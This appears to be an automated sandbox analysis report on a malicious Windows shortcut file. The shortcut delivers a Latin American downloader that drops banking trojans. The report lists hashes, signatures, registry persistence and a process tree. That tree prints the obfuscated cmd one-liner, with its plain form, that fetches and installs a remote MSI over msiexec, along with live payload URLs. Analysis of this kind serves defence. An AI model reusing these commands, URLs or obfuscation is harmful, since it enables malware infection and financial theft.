Analysis
-
max time kernel
119s -
max time network
125s -
platform
windows7_x64 -
resource
win7-en-20211104 -
submitted
23/11/2021, 15:26
Static task
static1
Behavioral task
behavioral1
Sample
23 de Novembro.lnk
Resource
win7-en-20211104
Behavioral task
behavioral2
Sample
23 de Novembro.lnk
Resource
win10-en-20211014
General
-
Target
23 de Novembro.lnk
-
Size
1KB
-
MD5
dbc89ba629ae4c675b9c77d6e2e7db23
-
SHA1
b27c719b2226145787b90a07494dc66b32817b4e
-
SHA256
0b58d3b97a11a82aafda54aa682cddc11cf513dbcf980a145a04c8b5a362ccdf
-
SHA512
7e5225364a21aae63a9aaef89aeb7994e0c902e81220a4e169463ccb32a17986858d2e53dd9208dea2c07012e4d24f891e67109ec1c2fd7337f2a40328853d86
Malware Config
Extracted
latam_generic_downloader
https://ym4dusty.s3.sa-east-1.amazonaws.com/softo.kn3
Signatures
-
Generic LATAM Downloader
Generic Latin American MSI downloader used to drop various banking trojans.
-
Blocklisted process makes network request 4 IoCs
flow pid Process 5 832 msiexec.exe 7 832 msiexec.exe 9 832 msiexec.exe 13 1924 MsiExec.exe -
Executes dropped EXE 1 IoCs
pid Process 292 NQbke.exe -
Loads dropped DLL 4 IoCs
pid Process 1924 MsiExec.exe 1924 MsiExec.exe 292 NQbke.exe 1200 iexplore.exe -
Use of msiexec (install) with remote resource 1 IoCs
pid Process 832 msiexec.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Windows\CurrentVersion\Run iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Windows\CurrentVersion\Run\Admin-_08726r0 = "\"C:\\Users\\Admin\\Saved Games\\Admin xlgrD\\NQbke.exe\"" iexplore.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\I: msiexec.exe -
Drops file in Windows directory 7 IoCs
description ioc Process File created C:\Windows\Installer\f75c237.ipi msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSI5469.tmp msiexec.exe File opened for modification C:\Windows\Installer\f75c237.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSIBD20.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIBFC6.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIC15D.tmp msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 iexplore.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString iexplore.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS iexplore.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer iexplore.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName iexplore.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion iexplore.exe -
Modifies Control Panel 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Control Panel\(Padrão) 2 = "NQbke" NQbke.exe Set value (str) \REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Control Panel\(Padrão) 3 = "C:\\Users\\Admin\\Saved Games\\Admin xlgrD\\" NQbke.exe -
Modifies data under HKEY_USERS 1 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad msiexec.exe -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 13 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 832 msiexec.exe -
Suspicious behavior: EnumeratesProcesses 32 IoCs
pid Process 1152 msiexec.exe 1152 msiexec.exe 1200 iexplore.exe 1200 iexplore.exe 1200 iexplore.exe 1200 iexplore.exe 1200 iexplore.exe 1200 iexplore.exe 1200 iexplore.exe 1200 iexplore.exe 1200 iexplore.exe 1200 iexplore.exe 1200 iexplore.exe 1200 iexplore.exe 1200 iexplore.exe 1200 iexplore.exe 1200 iexplore.exe 1200 iexplore.exe 1200 iexplore.exe 1200 iexplore.exe 1200 iexplore.exe 1200 iexplore.exe 1200 iexplore.exe 1200 iexplore.exe 1200 iexplore.exe 1200 iexplore.exe 1200 iexplore.exe 1200 iexplore.exe 1200 iexplore.exe 1200 iexplore.exe 1200 iexplore.exe 1200 iexplore.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 832 msiexec.exe Token: SeIncreaseQuotaPrivilege 832 msiexec.exe Token: SeRestorePrivilege 832 msiexec.exe Token: SeTakeOwnershipPrivilege 832 msiexec.exe Token: SeRestorePrivilege 1152 msiexec.exe Token: SeTakeOwnershipPrivilege 1152 msiexec.exe Token: SeSecurityPrivilege 1152 msiexec.exe Token: SeCreateTokenPrivilege 832 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 832 msiexec.exe Token: SeLockMemoryPrivilege 832 msiexec.exe Token: SeIncreaseQuotaPrivilege 832 msiexec.exe Token: SeMachineAccountPrivilege 832 msiexec.exe Token: SeTcbPrivilege 832 msiexec.exe Token: SeSecurityPrivilege 832 msiexec.exe Token: SeTakeOwnershipPrivilege 832 msiexec.exe Token: SeLoadDriverPrivilege 832 msiexec.exe Token: SeSystemProfilePrivilege 832 msiexec.exe Token: SeSystemtimePrivilege 832 msiexec.exe Token: SeProfSingleProcessPrivilege 832 msiexec.exe Token: SeIncBasePriorityPrivilege 832 msiexec.exe Token: SeCreatePagefilePrivilege 832 msiexec.exe Token: SeCreatePermanentPrivilege 832 msiexec.exe Token: SeBackupPrivilege 832 msiexec.exe Token: SeRestorePrivilege 832 msiexec.exe Token: SeShutdownPrivilege 832 msiexec.exe Token: SeDebugPrivilege 832 msiexec.exe Token: SeAuditPrivilege 832 msiexec.exe Token: SeSystemEnvironmentPrivilege 832 msiexec.exe Token: SeChangeNotifyPrivilege 832 msiexec.exe Token: SeRemoteShutdownPrivilege 832 msiexec.exe Token: SeUndockPrivilege 832 msiexec.exe Token: SeSyncAgentPrivilege 832 msiexec.exe Token: SeEnableDelegationPrivilege 832 msiexec.exe Token: SeManageVolumePrivilege 832 msiexec.exe Token: SeImpersonatePrivilege 832 msiexec.exe Token: SeCreateGlobalPrivilege 832 msiexec.exe Token: SeRestorePrivilege 1152 msiexec.exe Token: SeTakeOwnershipPrivilege 1152 msiexec.exe Token: SeRestorePrivilege 1152 msiexec.exe Token: SeTakeOwnershipPrivilege 1152 msiexec.exe Token: SeIncreaseQuotaPrivilege 1672 WMIC.exe Token: SeSecurityPrivilege 1672 WMIC.exe Token: SeTakeOwnershipPrivilege 1672 WMIC.exe Token: SeLoadDriverPrivilege 1672 WMIC.exe Token: SeSystemProfilePrivilege 1672 WMIC.exe Token: SeSystemtimePrivilege 1672 WMIC.exe Token: SeProfSingleProcessPrivilege 1672 WMIC.exe Token: SeIncBasePriorityPrivilege 1672 WMIC.exe Token: SeCreatePagefilePrivilege 1672 WMIC.exe Token: SeBackupPrivilege 1672 WMIC.exe Token: SeRestorePrivilege 1672 WMIC.exe Token: SeShutdownPrivilege 1672 WMIC.exe Token: SeDebugPrivilege 1672 WMIC.exe Token: SeSystemEnvironmentPrivilege 1672 WMIC.exe Token: SeRemoteShutdownPrivilege 1672 WMIC.exe Token: SeUndockPrivilege 1672 WMIC.exe Token: SeManageVolumePrivilege 1672 WMIC.exe Token: 33 1672 WMIC.exe Token: 34 1672 WMIC.exe Token: 35 1672 WMIC.exe Token: SeRestorePrivilege 1152 msiexec.exe Token: SeTakeOwnershipPrivilege 1152 msiexec.exe Token: SeRestorePrivilege 1152 msiexec.exe Token: SeTakeOwnershipPrivilege 1152 msiexec.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 832 msiexec.exe 1924 MsiExec.exe 832 msiexec.exe -
Suspicious use of WriteProcessMemory 33 IoCs
description pid Process procid_target PID 1512 wrote to memory of 860 1512 cmd.exe 29 PID 1512 wrote to memory of 860 1512 cmd.exe 29 PID 1512 wrote to memory of 860 1512 cmd.exe 29 PID 860 wrote to memory of 1120 860 cmd.exe 30 PID 860 wrote to memory of 1120 860 cmd.exe 30 PID 860 wrote to memory of 1120 860 cmd.exe 30 PID 1120 wrote to memory of 832 1120 cmd.exe 31 PID 1120 wrote to memory of 832 1120 cmd.exe 31 PID 1120 wrote to memory of 832 1120 cmd.exe 31 PID 1120 wrote to memory of 832 1120 cmd.exe 31 PID 1120 wrote to memory of 832 1120 cmd.exe 31 PID 1120 wrote to memory of 1892 1120 cmd.exe 32 PID 1120 wrote to memory of 1892 1120 cmd.exe 32 PID 1120 wrote to memory of 1892 1120 cmd.exe 32 PID 1120 wrote to memory of 1040 1120 cmd.exe 33 PID 1120 wrote to memory of 1040 1120 cmd.exe 33 PID 1120 wrote to memory of 1040 1120 cmd.exe 33 PID 1152 wrote to memory of 1924 1152 msiexec.exe 35 PID 1152 wrote to memory of 1924 1152 msiexec.exe 35 PID 1152 wrote to memory of 1924 1152 msiexec.exe 35 PID 1152 wrote to memory of 1924 1152 msiexec.exe 35 PID 1152 wrote to memory of 1924 1152 msiexec.exe 35 PID 1152 wrote to memory of 1924 1152 msiexec.exe 35 PID 1152 wrote to memory of 1924 1152 msiexec.exe 35 PID 1924 wrote to memory of 1672 1924 MsiExec.exe 37 PID 1924 wrote to memory of 1672 1924 MsiExec.exe 37 PID 1924 wrote to memory of 1672 1924 MsiExec.exe 37 PID 1924 wrote to memory of 1672 1924 MsiExec.exe 37 PID 292 wrote to memory of 1200 292 NQbke.exe 41 PID 292 wrote to memory of 1200 292 NQbke.exe 41 PID 292 wrote to memory of 1200 292 NQbke.exe 41 PID 292 wrote to memory of 1200 292 NQbke.exe 41 PID 292 wrote to memory of 1200 292 NQbke.exe 41
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\23 de Novembro.lnk"1⤵
- Suspicious use of WriteProcessMemory
PID:1512 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /V/c "sET JIEX=^|morMiSEe +1 ^|cMiSEmMiSEd&&sET IeCXE=mMiSEsieMiSExec.eMiSExe /i httMiSEps://qMiSE9j.s3.eu-west-MiSE2.amazoMiSEnaws.com/setMiSEupMiSE.mMiSEsi&&sEt MAoK=!IeCXE:MiSE=!&&sEt ESxCa=!JIEX:MiSE=!&&cmd /c !MAoK! !ESxCa!"2⤵
- Suspicious use of WriteProcessMemory
PID:860 -
C:\Windows\system32\cmd.execmd /c msiexec.exe /i https://q9j.s3.eu-west-2.amazonaws.com/setup.msi |more +1 |cmd3⤵
- Suspicious use of WriteProcessMemory
PID:1120 -
C:\Windows\system32\msiexec.exemsiexec.exe /i https://q9j.s3.eu-west-2.amazonaws.com/setup.msi4⤵
- Blocklisted process makes network request
- Use of msiexec (install) with remote resource
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:832
-
-
C:\Windows\system32\more.commore +14⤵PID:1892
-
-
C:\Windows\system32\cmd.execmd4⤵PID:1040
-
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1152 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 2457C7855EDB3C81A76071CF498112A42⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1924 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" process call create 'C:\Users\Admin\Saved Games\Admin xlgrD\NQbke.exe'3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1672
-
-
-
C:\Users\Admin\Saved Games\Admin xlgrD\NQbke.exe"C:\Users\Admin\Saved Games\Admin xlgrD\NQbke.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies Control Panel
- Suspicious use of WriteProcessMemory
PID:292 -
C:\Program Files (x86)\Internet explorer\iexplore.exe"C:\Program Files (x86)\Internet explorer\iexplore.exe"2⤵
- Loads dropped DLL
- Adds Run key to start application
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:1200
-